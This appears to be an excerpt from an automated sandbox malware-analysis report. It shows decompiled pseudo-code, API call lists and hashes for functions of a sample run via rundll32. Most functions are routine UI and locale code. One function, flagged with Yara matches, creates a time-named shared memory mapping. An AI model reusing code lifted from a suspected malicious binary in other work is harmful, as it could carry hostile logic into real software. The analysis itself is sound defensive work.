                          • Opcode Fuzzy Hash: c7336defbf2a0a318d24cc5fd69875b3284ca51564a5a97445b7364eeebbc11d
                          • Instruction Fuzzy Hash: A1312CB2A04609AFDB20DBA9DC49AEF7BFCAF45304F005566E915F2200E7349945CBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E5ADEC(void* __eax, void* __ecx, struct HDC__* __edx) {
                          				struct tagRECT _v44;
                          				struct tagRECT _v60;
                          				void* _v68;
                          				int _v80;
                          				int _t79;
                          				void* _t134;
                          				int _t135;
                          				void* _t136;
                          				void* _t159;
                          				void* _t160;
                          				void* _t161;
                          				struct HDC__* _t162;
                          				intOrPtr* _t163;
                          
                          				_t163 =  &(_v44.bottom);
                          				_t134 = __ecx;
                          				_t162 = __edx;
                          				_t161 = __eax;
                          				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
                          					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
                          				}
                          				_t78 =  *((intOrPtr*)(_t161 + 0x198));
                          				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
                          					L17:
                          					_t79 =  *(_t161 + 0x19c);
                          					if(_t79 == 0) {
                          						L27:
                          						return _t79;
                          					}
                          					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
                          					if(_t79 < 0) {
                          						goto L27;
                          					}
                          					_v44.right = _t79 + 1;
                          					_t159 = 0;
                          					do {
                          						_t79 = E00E2707C( *(_t161 + 0x19c), _t159);
                          						_t135 = _t79;
                          						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
                          							_v44.left = CreateSolidBrush(E00E2FA64(0xff000010));
                          							E00E25C48( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
                          							FrameRect(_t162,  &_v44, _v44);
                          							DeleteObject(_v60.right);
                          							_v60.left = CreateSolidBrush(E00E2FA64(0xff000014));
                          							E00E25C48( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
                          							FrameRect(_t162,  &_v60, _v60);
                          							_t79 = DeleteObject(_v68);
                          						}
                          						_t159 = _t159 + 1;
                          						_t75 =  &(_v44.right);
                          						 *_t75 = _v44.right - 1;
                          					} while ( *_t75 != 0);
                          					goto L27;
                          				}
                          				_t160 = 0;
                          				if(_t134 != 0) {
                          					_t160 = E00E270D8(_t78, _t134);
                          					if(_t160 < 0) {
                          						_t160 = 0;
                          					}
                          				}
                          				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
                          				if(_t160 <  *_t163) {
                          					do {
                          						_t136 = E00E2707C( *((intOrPtr*)(_t161 + 0x198)), _t160);
                          						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
                          							E00E25C48( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
                          							if(RectVisible(_t162,  &(_v44.top)) != 0) {
                          								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
                          									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
                          								}
                          								_v60.top = SaveDC(_t162);
                          								E00E55268(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
                          								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
                          								E00E57A98(_t136, _t162, 0xf, 0);
                          								RestoreDC(_t162, _v80);
                          								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
                          							}
                          						}
                          						_t160 = _t160 + 1;
                          					} while (_t160 < _v60.top);
                          				}
                          			}

                          0x00e5adf0
                          0x00e5adf3
                          0x00e5adf5
                          0x00e5adf7
                          0x00e5ae00
                          0x00e5ae1e
                          0x00e5ae1e
                          0x00e5ae21
                          0x00e5ae29
                          0x00e5af0e
                          0x00e5af0e
                          0x00e5af16
                          0x00e5b01b
                          0x00e5b01b
                          0x00e5b01b
                          0x00e5af1f
                          0x00e5af22
                          0x00000000
                          0x00000000
                          0x00e5af29
                          0x00e5af2d
                          0x00e5af2f
                          0x00e5af37
                          0x00e5af3c
                          0x00e5af45
                          0x00e5af7f
                          0x00e5afa2
                          0x00e5afad
                          0x00e5afb7
                          0x00e5afcc
                          0x00e5afef
                          0x00e5affa
                          0x00e5b004
                          0x00e5b004
                          0x00e5b009
                          0x00e5b00a
                          0x00e5b00a
                          0x00e5b00a
                          0x00000000
                          0x00e5af2f
                          0x00e5ae2f
                          0x00e5ae33
                          0x00e5ae3c
                          0x00e5ae40
                          0x00e5ae42
                          0x00e5ae42
                          0x00e5ae40
                          0x00e5ae4d
                          0x00e5ae53
                          0x00e5ae59
                          0x00e5ae66
                          0x00e5ae6c
                          0x00e5ae9a
                          0x00e5aeac
                          0x00e5aeb2
                          0x00e5aeb4
                          0x00e5aeb4
                          0x00e5aec0
                          0x00e5aecc
                          0x00e5aede
                          0x00e5aeee
                          0x00e5aef9
                          0x00e5aefe
                          0x00e5aefe
                          0x00e5aeac
                          0x00e5af04
                          0x00e5af05
                          0x00e5ae59

                          APIs
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ClipIntersectRestoreSaveVisible
                          • String ID:
                          • API String ID: 375863564-0
                          • Opcode ID: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
                          • Instruction ID: 4edc797232d495020c2e081862fa1521d526b8a96fdfd1649ad8302861690f30
                          • Opcode Fuzzy Hash: c08c65eb5d045d4ce27e2d3884b897740b40b46ef0d5837ce433ffda4b7cf540
                          • Instruction Fuzzy Hash: 9F516D712043449BDB18DF68C8C5B6B77E9AF44304F085968FE899B296EB35EC89CB11
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00E44128(intOrPtr _a4) {
                          				intOrPtr _t27;
                          				struct HMENU__* _t48;
                          
                          				_t27 =  *((intOrPtr*)(_a4 - 4));
                          				if( *((char*)(_t27 + 0x229)) != 0) {
                          					_t27 =  *((intOrPtr*)(_a4 - 4));
                          					if(( *(_t27 + 0x228) & 0x00000001) != 0) {
                          						_t27 =  *((intOrPtr*)(_a4 - 4));
                          						if( *((char*)(_t27 + 0x22f)) != 1) {
                          							_t48 = GetSystemMenu(E00E5CFE0( *((intOrPtr*)(_a4 - 4))), 0);
                          							if( *((char*)( *((intOrPtr*)(_a4 - 4)) + 0x229)) == 3) {
                          								DeleteMenu(_t48, 0xf130, 0);
                          								DeleteMenu(_t48, 7, 0x400);
                          								DeleteMenu(_t48, 5, 0x400);
                          								DeleteMenu(_t48, 0xf030, 0);
                          								DeleteMenu(_t48, 0xf020, 0);
                          								DeleteMenu(_t48, 0xf000, 0);
                          								return DeleteMenu(_t48, 0xf120, 0);
                          							}
                          							if(( *( *((intOrPtr*)(_a4 - 4)) + 0x228) & 0x00000002) == 0) {
                          								EnableMenuItem(_t48, 0xf020, 1);
                          							}
                          							_t27 =  *((intOrPtr*)(_a4 - 4));
                          							if(( *(_t27 + 0x228) & 0x00000004) == 0) {
                          								return EnableMenuItem(_t48, 0xf030, 1);
                          							}
                          						}
                          					}
                          				}
                          				return _t27;
                          			}

                          0x00e4412f
                          0x00e44139
                          0x00e44142
                          0x00e4414c
                          0x00e44155
                          0x00e4415f
                          0x00e44178
                          0x00e44187
                          0x00e44191
                          0x00e4419e
                          0x00e441ab
                          0x00e441b8
                          0x00e441c5
                          0x00e441d2
                          0x00000000
                          0x00e441df
                          0x00e441f3
                          0x00e441fd
                          0x00e441fd
                          0x00e44205
                          0x00e4420f
                          0x00000000
                          0x00e44219
                          0x00e4420f
                          0x00e4415f
                          0x00e4414c
                          0x00e44220

                          APIs
                          • GetSystemMenu.USER32(00000000,00000000), ref: 00E44173
                          • DeleteMenu.USER32(00000000,0000F130,00000000,00000000,00000000), ref: 00E44191
                          • DeleteMenu.USER32(00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00E4419E
                          • DeleteMenu.USER32(00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00E441AB
                          • DeleteMenu.USER32(00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000,00000000), ref: 00E441B8
                          • DeleteMenu.USER32(00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000,0000F130,00000000,00000000), ref: 00E441C5
                          • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000,00000007,00000400,00000000), ref: 00E441D2
                          • DeleteMenu.USER32(00000000,0000F120,00000000,00000000,0000F000,00000000,00000000,0000F020,00000000,00000000,0000F030,00000000,00000000,00000005,00000400,00000000), ref: 00E441DF
                          • EnableMenuItem.USER32 ref: 00E441FD
                          • EnableMenuItem.USER32 ref: 00E44219
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Menu$Delete$EnableItem$System
                          • String ID:
                          • API String ID: 3985193851-0
                          • Opcode ID: 81f4901d7ede723e1163a8eda95c3a797ef0f0db54d8a2dc5d854a128f2a7103
                          • Instruction ID: 27c48618a4085a110792512c74545f90dfa703b3bfcdddb55b684ff8f195b9ca
                          • Opcode Fuzzy Hash: 81f4901d7ede723e1163a8eda95c3a797ef0f0db54d8a2dc5d854a128f2a7103
                          • Instruction Fuzzy Hash: 4D215EB03803547BE3209B64DC8EFD97BD95B04B19F1560A0BA587F2E3CAB4A9C08618
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E010819C6(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
                          				intOrPtr _v12;
                          				struct _FILETIME* _v16;
                          				short _v60;
                          				struct _FILETIME* _t14;
                          				intOrPtr _t15;
                          				long _t18;
                          				void* _t22;
                          				intOrPtr _t31;
                          				long _t32;
                          				void* _t34;
                          
                          				_t31 = __edx;
                          				_t14 =  &_v16;
                          				GetSystemTimeAsFileTime(_t14);
                          				_push(0x192);
                          				_push(0x54d38000);
                          				_push(_v12);
                          				_push(_v16);
                          				L010821F0();
                          				_push(_t14);
                          				_v16 = _t14;
                          				_t15 =  *0x10841d0;
                          				_push(_t15 + 0x108505e);
                          				_push(_t15 + 0x1085054);
                          				_push(0x16);
                          				_push( &_v60);
                          				_v12 = _t31;
                          				L010821EA();
                          				_t18 = _a4;
                          				if(_t18 == 0) {
                          					_t18 = 0x1000;
                          				}
                          				_t34 = CreateFileMappingW(0xffffffff, 0x10841c0, 4, 0, _t18,  &_v60);
                          				if(_t34 == 0) {
                          					_t32 = GetLastError();
                          				} else {
                          					if(_a4 != 0 || GetLastError() == 0xb7) {
                          						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
                          						if(_t22 == 0) {
                          							_t32 = GetLastError();
                          							if(_t32 != 0) {
                          								goto L9;
                          							}
                          						} else {
                          							 *_a8 = _t34;
                          							 *_a12 = _t22;
                          							_t32 = 0;
                          						}
                          					} else {
                          						_t32 = 2;
                          						L9:
                          						CloseHandle(_t34);
                          					}
                          				}
                          				return _t32;
                          			}

                          0x010819c6
                          0x010819cf
                          0x010819d3
                          0x010819d9
                          0x010819de
                          0x010819e3
                          0x010819e6
                          0x010819e9
                          0x010819ee
                          0x010819ef
                          0x010819f2
                          0x010819fd
                          0x01081a04
                          0x01081a08
                          0x01081a0a
                          0x01081a0b
                          0x01081a0e
                          0x01081a13
                          0x01081a1d
                          0x01081a1f
                          0x01081a1f
                          0x01081a39
                          0x01081a3d
                          0x01081a8d
                          0x01081a3f
                          0x01081a48
                          0x01081a5e
                          0x01081a66
                          0x01081a78
                          0x01081a7c
                          0x00000000
                          0x00000000
                          0x01081a68
                          0x01081a6b
                          0x01081a70
                          0x01081a72
                          0x01081a72
                          0x01081a53
                          0x01081a55
                          0x01081a7e
                          0x01081a7f
                          0x01081a7f
                          0x01081a48
                          0x01081a95

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(?,?,00000002,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?,?), ref: 010819D3
                          • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 010819E9
                          • _snwprintf.NTDLL ref: 01081A0E
                          • CreateFileMappingW.KERNEL32(000000FF,010841C0,00000004,00000000,?,?), ref: 01081A33
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?), ref: 01081A4A
                          • MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 01081A5E
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?), ref: 01081A76
                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A), ref: 01081A7F
                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,01081CDE,0000000A,?), ref: 01081A87
                          Memory Dump Source
                          • Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                          • Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                          • String ID:
                          • API String ID: 1724014008-0
                          • Opcode ID: 32601516d908a0ed92cbb2ae5b5aea976662e37b2e5b8603a893babb8720dd4e
                          • Instruction ID: fbbb740c91e597ebde892ce6a5cde19087c934587e98cf579e224077b5339089
                          • Opcode Fuzzy Hash: 32601516d908a0ed92cbb2ae5b5aea976662e37b2e5b8603a893babb8720dd4e
                          • Instruction Fuzzy Hash: 4721B672608104BFDB21AFA8DC84EEEBBE9EF48750F104075F6D5DB140D63599068B61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 72%
                          			E00E1CA64(void* __ebx, void* __edx, void* __edi, void* __esi) {
                          				char _v8;
                          				char _v12;
                          				char _v16;
                          				char _v20;
                          				char _v24;
                          				char _v28;
                          				char _v32;
                          				char _v36;
                          				char _v40;
                          				char _v44;
                          				char _v48;
                          				char _v52;
                          				char _v56;
                          				char _v60;
                          				char _v64;
                          				char _v68;
                          				void* _t104;
                          				void* _t111;
                          				void* _t133;
                          				intOrPtr _t183;
                          				intOrPtr _t193;
                          				intOrPtr _t194;
                          
                          				_t191 = __esi;
                          				_t190 = __edi;
                          				_t193 = _t194;
                          				_t133 = 8;
                          				do {
                          					_push(0);
                          					_push(0);
                          					_t133 = _t133 - 1;
                          				} while (_t133 != 0);
                          				_push(__ebx);
                          				_push(_t193);
                          				_push(0xe1cd2f);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t194;
                          				E00E1C8F0();
                          				E00E1B1F8(__ebx, __edi, __esi);
                          				_t196 =  *0xe7f750;
                          				if( *0xe7f750 != 0) {
                          					E00E1B3D0(__esi, _t196);
                          				}
                          				_t132 = GetThreadLocale();
                          				E00E1B148(_t43, 0, 0x14,  &_v20);
                          				E00E140BC(0xe7f684, _v20);
                          				E00E1B148(_t43, 0xe1cd44, 0x1b,  &_v24);
                          				 *0xe7f688 = E00E183E8(0xe1cd44, 0, _t196);
                          				E00E1B148(_t132, 0xe1cd44, 0x1c,  &_v28);
                          				 *0xe7f689 = E00E183E8(0xe1cd44, 0, _t196);
                          				 *0xe7f68a = E00E1B194(_t132, 0x2c, 0xf);
                          				 *0xe7f68b = E00E1B194(_t132, 0x2e, 0xe);
                          				E00E1B148(_t132, 0xe1cd44, 0x19,  &_v32);
                          				 *0xe7f68c = E00E183E8(0xe1cd44, 0, _t196);
                          				 *0xe7f68d = E00E1B194(_t132, 0x2f, 0x1d);
                          				E00E1B148(_t132, "m/d/yy", 0x1f,  &_v40);
                          				E00E1B480(_v40, _t132,  &_v36, _t190, _t191, _t196);
                          				E00E140BC(0xe7f690, _v36);
                          				E00E1B148(_t132, "mmmm d, yyyy", 0x20,  &_v48);
                          				E00E1B480(_v48, _t132,  &_v44, _t190, _t191, _t196);
                          				E00E140BC(0xe7f694, _v44);
                          				 *0xe7f698 = E00E1B194(_t132, 0x3a, 0x1e);
                          				E00E1B148(_t132, 0xe1cd78, 0x28,  &_v52);
                          				E00E140BC(0xe7f69c, _v52);
                          				E00E1B148(_t132, 0xe1cd84, 0x29,  &_v56);
                          				E00E140BC(0xe7f6a0, _v56);
                          				E00E14068( &_v12);
                          				E00E14068( &_v16);
                          				E00E1B148(_t132, 0xe1cd44, 0x25,  &_v60);
                          				_t104 = E00E183E8(0xe1cd44, 0, _t196);
                          				_t197 = _t104;
                          				if(_t104 != 0) {
                          					E00E14100( &_v8, 0xe1cd9c);
                          				} else {
                          					E00E14100( &_v8, 0xe1cd90);
                          				}
                          				E00E1B148(_t132, 0xe1cd44, 0x23,  &_v64);
                          				_t111 = E00E183E8(0xe1cd44, 0, _t197);
                          				_t198 = _t111;
                          				if(_t111 == 0) {
                          					E00E1B148(_t132, 0xe1cd44, 0x1005,  &_v68);
                          					if(E00E183E8(0xe1cd44, 0, _t198) != 0) {
                          						E00E14100( &_v12, 0xe1cdb8);
                          					} else {
                          						E00E14100( &_v16, 0xe1cda8);
                          					}
                          				}
                          				_push(_v12);
                          				_push(_v8);
                          				_push(":mm");
                          				_push(_v16);
                          				E00E143E8();
                          				_push(_v12);
                          				_push(_v8);
                          				_push(":mm:ss");
                          				_push(_v16);
                          				E00E143E8();
                          				 *0xe7f752 = E00E1B194(_t132, 0x2c, 0xc);
                          				_pop(_t183);
                          				 *[fs:eax] = _t183;
                          				_push(0xe1cd36);
                          				return E00E1408C( &_v68, 0x10);
                          			}

                          0x00e1ca64
                          0x00e1ca64
                          0x00e1ca65
                          0x00e1ca67
                          0x00e1ca6c
                          0x00e1ca6c
                          0x00e1ca6e
                          0x00e1ca70
                          0x00e1ca70
                          0x00e1ca73
                          0x00e1ca76
                          0x00e1ca77
                          0x00e1ca7c
                          0x00e1ca7f
                          0x00e1ca82
                          0x00e1ca87
                          0x00e1ca8c
                          0x00e1ca93
                          0x00e1ca95
                          0x00e1ca95
                          0x00e1ca9f
                          0x00e1caae
                          0x00e1cabb
                          0x00e1cad0
                          0x00e1cadf
                          0x00e1caf4
                          0x00e1cb03
                          0x00e1cb16
                          0x00e1cb29
                          0x00e1cb3e
                          0x00e1cb4d
                          0x00e1cb60
                          0x00e1cb75
                          0x00e1cb80
                          0x00e1cb8d
                          0x00e1cba2
                          0x00e1cbad
                          0x00e1cbba
                          0x00e1cbcd
                          0x00e1cbe2
                          0x00e1cbef
                          0x00e1cc04
                          0x00e1cc11
                          0x00e1cc19
                          0x00e1cc21
                          0x00e1cc36
                          0x00e1cc40
                          0x00e1cc45
                          0x00e1cc47
                          0x00e1cc60
                          0x00e1cc49
                          0x00e1cc51
                          0x00e1cc51
                          0x00e1cc75
                          0x00e1cc7f
                          0x00e1cc84
                          0x00e1cc86
                          0x00e1cc98
                          0x00e1cca9
                          0x00e1ccc2
                          0x00e1ccab
                          0x00e1ccb3
                          0x00e1ccb3
                          0x00e1cca9
                          0x00e1ccc7
                          0x00e1ccca
                          0x00e1cccd
                          0x00e1ccd2
                          0x00e1ccdf
                          0x00e1cce4
                          0x00e1cce7
                          0x00e1ccea
                          0x00e1ccef
                          0x00e1ccfc
                          0x00e1cd0f
                          0x00e1cd16
                          0x00e1cd19
                          0x00e1cd1c
                          0x00e1cd2e

                          APIs
                          • GetThreadLocale.KERNEL32(00000000,00E1CD2F,?,?,00000000,00000000), ref: 00E1CA9A
                            • Part of subcall function 00E1B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00E1B166
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread
                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                          • API String ID: 4232894706-2493093252
                          • Opcode ID: 87ac2d038348992bb618a0ee8a4471a47c2d45dca8575bbff865b30ba1a53fce
                          • Instruction ID: e1f53eb8f607ed351a465ee4c77c26a8e39b562b3867c50f1d8b8f5b4096933b
                          • Opcode Fuzzy Hash: 87ac2d038348992bb618a0ee8a4471a47c2d45dca8575bbff865b30ba1a53fce
                          • Instruction Fuzzy Hash: B5616D70B41248ABDB01EBE4DC92ADE76E6AB88300F61B439F101FB356CA34D9C58751
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 77%
                          			E00E1F04C(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
                          				char _v260;
                          				char _v768;
                          				char _v772;
                          				short* _v776;
                          				intOrPtr _v780;
                          				char _v784;
                          				signed int _v788;
                          				signed short* _v792;
                          				char _v796;
                          				char _v800;
                          				intOrPtr* _v804;
                          				void* __ebp;
                          				signed char _t47;
                          				signed int _t54;
                          				void* _t62;
                          				intOrPtr* _t73;
                          				intOrPtr* _t91;
                          				void* _t93;
                          				void* _t95;
                          				void* _t98;
                          				void* _t99;
                          				intOrPtr* _t108;
                          				void* _t112;
                          				intOrPtr _t113;
                          				char* _t114;
                          				void* _t115;
                          
                          				_t100 = __ecx;
                          				_v780 = __ecx;
                          				_t91 = __edx;
                          				_v776 = __eax;
                          				if(( *(__edx + 1) & 0x00000020) == 0) {
                          					E00E1EBF4(0x80070057);
                          				}
                          				_t47 =  *_t91;
                          				if((_t47 & 0x00000fff) != 0xc) {
                          					_push(_t91);
                          					_push(_v776);
                          					L00E1D9A8();
                          					return E00E1EBF4(_v776);
                          				} else {
                          					if((_t47 & 0x00000040) == 0) {
                          						_v792 =  *((intOrPtr*)(_t91 + 8));
                          					} else {
                          						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
                          					}
                          					_v788 =  *_v792 & 0x0000ffff;
                          					_t93 = _v788 - 1;
                          					if(_t93 < 0) {
                          						L9:
                          						_push( &_v772);
                          						_t54 = _v788;
                          						_push(_t54);
                          						_push(0xc);
                          						L00E1DDFC();
                          						_t113 = _t54;
                          						if(_t113 == 0) {
                          							E00E1E94C(_t100);
                          						}
                          						E00E1EFA4(_v776);
                          						 *_v776 = 0x200c;
                          						 *((intOrPtr*)(_v776 + 8)) = _t113;
                          						_t95 = _v788 - 1;
                          						if(_t95 < 0) {
                          							L14:
                          							_t97 = _v788 - 1;
                          							if(E00E1EFC0(_v788 - 1, _t115) != 0) {
                          								L00E1DE14();
                          								E00E1EBF4(_v792);
                          								L00E1DE14();
                          								E00E1EBF4( &_v260);
                          								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
                          							}
                          							_t62 = E00E1EFF0(_t97, _t115);
                          						} else {
                          							_t98 = _t95 + 1;
                          							_t73 =  &_v768;
                          							_t108 =  &_v260;
                          							do {
                          								 *_t108 =  *_t73;
                          								_t108 = _t108 + 4;
                          								_t73 = _t73 + 8;
                          								_t98 = _t98 - 1;
                          							} while (_t98 != 0);
                          							do {
                          								goto L14;
                          							} while (_t62 != 0);
                          							return _t62;
                          						}
                          					} else {
                          						_t99 = _t93 + 1;
                          						_t112 = 0;
                          						_t114 =  &_v772;
                          						do {
                          							_v804 = _t114;
                          							_push(_v804 + 4);
                          							_t18 = _t112 + 1; // 0x1
                          							_push(_v792);
                          							L00E1DE04();
                          							E00E1EBF4(_v792);
                          							_push( &_v784);
                          							_t21 = _t112 + 1; // 0x1
                          							_push(_v792);
                          							L00E1DE0C();
                          							E00E1EBF4(_v792);
                          							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
                          							_t112 = _t112 + 1;
                          							_t114 = _t114 + 8;
                          							_t99 = _t99 - 1;
                          						} while (_t99 != 0);
                          						goto L9;
                          					}
                          				}
                          			}

                          0x00e1f04c
                          0x00e1f058
                          0x00e1f05e
                          0x00e1f060
                          0x00e1f06a
                          0x00e1f071
                          0x00e1f071
                          0x00e1f076
                          0x00e1f084
                          0x00e1f1fd
                          0x00e1f204
                          0x00e1f205
                          0x00000000
                          0x00e1f08a
                          0x00e1f08d
                          0x00e1f09f
                          0x00e1f08f
                          0x00e1f094
                          0x00e1f094
                          0x00e1f0ae
                          0x00e1f0ba
                          0x00e1f0bd
                          0x00e1f12a
                          0x00e1f130
                          0x00e1f131
                          0x00e1f137
                          0x00e1f138
                          0x00e1f13a
                          0x00e1f13f
                          0x00e1f143
                          0x00e1f145
                          0x00e1f145
                          0x00e1f150
                          0x00e1f15b
                          0x00e1f166
                          0x00e1f16f
                          0x00e1f172
                          0x00e1f18e
                          0x00e1f195
                          0x00e1f1a0
                          0x00e1f1b7
                          0x00e1f1bc
                          0x00e1f1d0
                          0x00e1f1d5
                          0x00e1f1e8
                          0x00e1f1e8
                          0x00e1f1f1
                          0x00e1f174
                          0x00e1f174
                          0x00e1f175
                          0x00e1f17b
                          0x00e1f181
                          0x00e1f183
                          0x00e1f185
                          0x00e1f188
                          0x00e1f18b
                          0x00e1f18b
                          0x00e1f18e
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00e1f18e
                          0x00e1f0bf
                          0x00e1f0bf
                          0x00e1f0c0
                          0x00e1f0c2
                          0x00e1f0c8
                          0x00e1f0ca
                          0x00e1f0d9
                          0x00e1f0da
                          0x00e1f0e4
                          0x00e1f0e5
                          0x00e1f0ea
                          0x00e1f0f5
                          0x00e1f0f6
                          0x00e1f100
                          0x00e1f101
                          0x00e1f106
                          0x00e1f121
                          0x00e1f123
                          0x00e1f124
                          0x00e1f127
                          0x00e1f127
                          0x00000000
                          0x00e1f0c8
                          0x00e1f0bd

                          APIs
                          • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00E1F0E5
                          • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00E1F101
                          • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00E1F13A
                          • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00E1F1B7
                          • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 00E1F1D0
                          • VariantCopy.OLEAUT32(?), ref: 00E1F205
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true
                          • Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd
                          Similarity
                          • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                          • String ID:
                          • API String ID: 351091851-3916222277
                          • Opcode ID: 1776f6705603e5dd5b83fa5c3157d0e7522ba28b09e84c66c77e9e7b777ebabb
                          • Instruction ID: 35f13afba6be8373dcef73d38e6efc5042855b35e92b6922dbeeac169ca89a5a
